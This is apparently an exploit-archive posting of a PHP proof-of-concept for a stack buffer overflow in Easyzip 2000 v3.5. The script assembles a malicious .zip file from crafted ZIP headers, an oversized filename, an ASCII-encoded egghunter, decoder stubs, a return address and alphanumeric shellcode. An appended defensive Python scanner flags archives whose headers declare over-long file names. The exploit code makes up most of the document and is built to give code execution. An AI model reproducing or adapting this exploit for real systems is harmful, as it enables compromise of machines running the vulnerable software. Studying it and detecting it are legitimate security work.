Easyzip 2000 3.5 Stack Buffer Overflow
Posted Apr 27, 2010
Authored by mr_me

Easyzip 2000 version 3.5 stack buffer overflow exploit that creates a malicious .zip file.

tags | exploit, overflow
SHA-256 | f827dd8a007d460a0ad5d41354ebc9e4869fb479b3b111388f31bb20e701c800

<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://www.thefreesite.com/ezip35.exe
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-032
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascii lowercase and payload space < 400 bytes, yet we still get code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/

// local file header
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";

// central directory file header
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

// end of central directory record
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";

// filename
$_____name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x73\x65\x63\x72\x65\x63\x74".
"\x5F\x70\x61\x73\x73\x77\x6F\x72\x64\x73\x2E\x74\x78\x74";

// corelan security team msgbox
$_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2".
"M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W".
"343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4".
"JJL15612J1267KM2K4D903K03";

// lowercase ascii encoded egghunter
$eh = "j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5".
"225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927";

$decoderStage1 = "\x25\x4a\x4d\x4e\x55\x25\x35\x08\x31\x2a".
"\x2d\x49\x49\x49\x5e\x2d\x4a\x49\x4a\x5e\x2d\xc1\xc1\xc1\x5f";

$decoderStage2 = "\x25\x4A\x4d\x4e\x55\x25\x10\x10\x31\x10".
"\x2d\x2a\x69\x37\xc1\x2d\x2a\x69\x36\xc1\x2d\x2b\x6a\xb1\x9b";

$align = "\x60".str_repeat("\x5d",7);

$___exploit = $_____name.str_repeat("\x61",249).$eh.str_repeat("\x61",144-strlen($eh))."\x60".
str_repeat("\x5b",8).$decoderStage1.$align.$decoderStage2.$align."\x98\x8e\x89\xf1\x64\x64".
"\x16\x32\x40\x00";
$___exploit .= str_repeat("\x61",2000-strlen($___exploit))."\x57\x30\x30\x54\x57\x30\x30\x54".$_____sc.
str_repeat("\x61",2056-strlen($_____sc))."\x2e\x74\x78\x74";

$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-easyzip.zip",$_____b00m);
?>
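
Added defensive example, not part of the original post or the author's code: the file name the PoC assembles is 4068 bytes long (0x0FE4, the `\xe4\x0f` in both headers), so a pre-open check can flag archives whose headers declare an implausibly long file name. The 260-byte limit (Windows MAX_PATH) and all function names are assumptions; the sample archives are constructed with harmless names.

```python
import io
import struct
import zipfile

# Assumed policy limit: Windows MAX_PATH. Tune for your environment.
MAX_NAME_LEN = 260

# signature -> (record label, offset of the 16-bit file-name-length field)
RECORDS = {
    b"PK\x03\x04": ("local file header", 26),
    b"PK\x01\x02": ("central directory header", 28),
}

def oversized_names(data, limit=MAX_NAME_LEN):
    """Return (offset, record label, declared name length) for each header
    whose declared file-name length exceeds `limit`.

    Signature scanning is a heuristic: it does not trust the archive's own
    directory, so it also sees headers a lenient parser might act on.
    """
    findings = []
    for sig, (label, field_off) in RECORDS.items():
        pos = data.find(sig)
        while pos != -1:
            end = pos + field_off + 2
            if end <= len(data):  # skip headers truncated before the field
                (name_len,) = struct.unpack_from("<H", data, pos + field_off)
                if name_len > limit:
                    findings.append((pos, label, name_len))
            pos = data.find(sig, pos + 4)
    return sorted(findings)

def make_zip(name):
    """Constructed sample: one stored, empty entry with the given name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, b"")
    return buf.getvalue()

if __name__ == "__main__":
    for title, blob in (("benign", make_zip("readme.txt")),
                        ("long name", make_zip("a" * 4068))):
        print(title, oversized_names(blob))
```

Because the scan matches signatures anywhere in the file, compressed data that happens to contain `PK\x03\x04` can produce a false positive; treat a hit as a reason to quarantine and inspect, not as proof of an exploit.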